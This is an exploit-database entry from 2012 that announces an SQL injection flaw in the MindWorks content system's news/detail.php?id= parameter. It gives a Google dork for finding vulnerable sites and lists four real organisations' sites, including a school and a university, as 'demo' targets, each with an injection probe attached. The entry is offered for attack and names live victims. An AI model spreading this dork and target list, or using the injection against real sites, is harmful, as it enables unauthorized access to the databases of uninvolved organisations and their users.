MindWorks SQL Injection Vulnerability

2012-09-03T00:00:00
ID 1337DAY-ID-19311
Type zdt
Reporter The Black Devils
Modified 2012-09-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                                   db                                       88                          
      d88b                                      ""                          
     d8'`8b                                                                 
    d8'  `8b     ,adPPYba,  ,adPPYba, ,adPPYba, 88 8b,dPPYba,   ,adPPYba,   
   d8YaaaaY8b    I8[    "" a8P_____88 I8[    "" 88 88P'   `"8a a8"     "8a  
  d8""""""""8b    `"Y8ba,  8PP"""""""  `"Y8ba,  88 88       88 8b       d8  
 d8'        `8b  aa    ]8I "8b,   ,aa aa    ]8I 88 88       88 "8a,   ,a8"  
d8'          `8b `"YbbdP"'  `"Ybbd8"' `"YbbdP"' 88 88       88  `"YbbdP"'   
                                                                            

# Exploit Title: MindWorks  sql injection Vulnerability
# Date: 02/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.mindworks.co.uk/
# Category:: [ webapps ]
# Google dork: MindWorks inurl:"news/detail.php?id="
# Tested on: [Windows]

-------------------------------

http:\Localhost\news\detail.php?id= [ sql injection ]


-------------------------------
# Demo site:
http://www.brock.ac.uk/news/news/detail.php?id=000346'
https://powertraveller.com/news/detail.php?id=000126'
http://www.suzuki-marine.co.uk/news/detail.php?id=400766'
http://www.oakwoodschool.co.uk/live/news/detail.php?id=000561'
 
-------------------------------


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------



#  0day.today [2018-04-03]  #